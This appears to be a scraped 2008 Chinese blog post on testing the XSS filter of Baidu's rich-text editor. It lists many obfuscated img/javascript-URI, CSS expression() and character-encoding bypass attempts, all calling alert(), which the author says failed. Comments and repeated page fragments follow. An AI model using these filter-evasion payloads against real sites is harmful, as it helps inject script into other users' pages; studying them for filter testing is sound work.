test

查看文章测试百度XSS Filter的一些例子 2008-07-18 11:59 大风起兮云飞扬 Secur1ty just lik3 a
girl. B0th of th3m h4ve s0me h0les. Y0u alw4ys try to f1nd the h0le, but n0t 3very tim3 y0u c4n 3xpl0it it! 主页博客相册 | 个人档案 | 好友测试百度XSS Filter的一些例子_大风起兮云飞扬 http://hi.baidu.com/aullik5/blog/item/58e03a00057fbf08... 第1页共3页 2009-5-8 8:30

类别：象牙塔 | 添加到搜藏 | 浏览(299) | 评论 (4) 上一篇：The Week
of Baidu Bugs - Day 0... 下一篇：需要明晰的一些概念最近读者：今天有朋友和我讨论了一下关于百度富文本编辑器 XSS Filter的问题，关于过滤规则可以看我之前在WoBB的终章里总结的8条规则。这里我可以把我测试XSS Filter的部分html发一下，希望能帮助到某些朋友。(当然我最终还是没绕过去) 如下： <img src="java/*/*javascript*/script/*javascript*/*/script:alert();" > <img src="java/*/*javascript*/java/*javascript*/script/*javascript*/*/script:alert();" > <img src="java/*java/*javascript*/1script*/script:alert();"> <img src="java/*script:alert();"><img src="javaa*/script:alert();"> <img src="java/*exp/**/script:alert();*/ression(alert(1))"> <img style="width: exp/*ression(alert());" src="java/*exp/**/script:alert();*/ression(alert(1))">  <img src="java/*javascript*/script java\script:alert();"> <img src="java/*javascript*/1script/*><x src=javascript:alert();"> <img src="java/*java/*javascript*/1script*/script:alert();/*><x fvck=java/*style=\java*/script:alert();> <img src="java/*java/*<a fvck='java/*style=\java*/script:alert();'>*/1script*/script:alert();"> <img src="java/*java <a href='/*java/*style=\java*/script:alert();'>*/script:alert(); > " <img src=<java/*<<a>>*/scrip >> <a style="background-image: url(@import \' fvck\') " > <img onbeforeupdate="fvck" ondataavailable="fvck" onrowsdelete="fvck" onrowsinserted="fvck" /> <img src="java/*ssss%c1*/script:alert();*/"> <img src="java/*sssss%c1*/%c1/*script:alert();*/script:alert();"> <img src="java/*java <a href='java/*java/*style=%c1\java%c1*/script:alert();'>*/script:alert(); > "> <img src="javascript:alert();"> %ef');alert();( <img src="j%c1%26;javascript:alert();" > <img src="java/*xxxx%81*/script:alert();" > 测试百度XSS Filter的一些例子_大风起兮云飞扬 http://hi.baidu.com/aullik5/blog/item/58e03a00057fbf08... 第2页共3页 2009-5-8 8:30

登录后，您就出现在这里。 hcper xsser macro913 cnhulk ezss linx2008 paleswd cnryan
网友评论： 1 nuke318 2008-07-18 13:04 | 回复大略看一下貌似挺严格想绕可能没这么简单博主发帖很有规律都是11快12点时候每天来都抢沙发哈哈 2 aullik5 2008-07-18 13:19 | 回复哈哈，因为这个时候刚好有点空~~~ 3 网友:N 2008-07-18 14:12 | 回复 lol~ 4 biweilun 2008-07-19 10:00 | 回复不行，我以后也要这个时候来抢！！发表评论：姓名：注册 | 登录网址或邮箱： (选填) 内容：插入表情验证码：请点击后输入四位验证码，字母不区分大小写 ©2009 Baidu 测试百度XSS Filter的一些例子_大风起兮云飞扬 http://hi.baidu.com/aullik5/blog/item/58e03a00057fbf08... 第3页共3页 2009-5-8 8:30

test

test

kimsh

Featured

Transcript

查看文章测试百度XSS Filter的一些例子 2008-07-18 11:59 大风起兮云飞扬 Secur1ty just lik3 a

类别：象牙塔 | 添加到搜藏 | 浏览(299) | 评论 (4) 上一篇：The Week

登录后，您就出现在这里。 hcper xsser macro913 cnhulk ezss linx2008 paleswd cnryan

test

test

kimsh

Featured

Transcript

查看文章 测试百度XSS Filter的一些例子 2008-07-18 11:59 大风起兮云飞扬 Secur1ty just lik3 a

类别：象牙塔 | 添加到搜藏 | 浏览(299) | 评论 (4) 上一篇：The Week

登录后，您就 出现在这里。 hcper xsser macro913 cnhulk ezss linx2008 paleswd cnryan

查看文章测试百度XSS Filter的一些例子 2008-07-18 11:59 大风起兮云飞扬 Secur1ty just lik3 a

登录后，您就出现在这里。 hcper xsser macro913 cnhulk ezss linx2008 paleswd cnryan